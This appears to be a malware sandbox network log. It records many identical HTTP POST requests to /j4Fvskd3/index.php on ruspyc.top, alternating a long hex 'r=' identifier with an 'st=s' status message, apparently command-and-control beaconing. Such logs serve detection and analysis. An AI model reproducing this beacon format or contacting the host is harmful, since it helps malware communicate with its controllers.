Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 156Cache-Control: no-cacheData Raw: 72 3d 34 43 38 32 36 34 37 45 46 43 36 39 35 45 41 37 39 34 45 32 34 46 34 46 46 35 38 41 38 45 39 41 35 39 45 31 34 46 45 45 35 42 31 41 36 43 45 34 31 38 30 33 33 35 46 41 33 35 41 31 43 33 38 32 39 37 45 41 35 44 32 38 36 35 39 35 43 45 30 32 35 37 46 33 42 37 44 46 31 34 35 34 30 41 34 46 36 34 38 43 37 46 34 44 39 45 37 33 34 39 35 38 39 45 42 44 42 31 33 32 32 35 36 39 33 35 42 30 30 42 33 35 31 38 45 44 41 42 43 44 43 35 34 38 46 36 31 39 41 44 35 36 43 38 Data Ascii: r=4C82647EFC695EA794E24F4FF58A8E9A59E14FEE5B1A6CE4180335FA35A1C38297EA5D286595CE0257F3B7DF14540A4F648C7F4D9E7349589EBDB132256935B00B3518EDABCDC548F619AD56C8
Source: global traffic HTTP traffic detected: POST /j4Fvskd3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: ruspyc.topContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
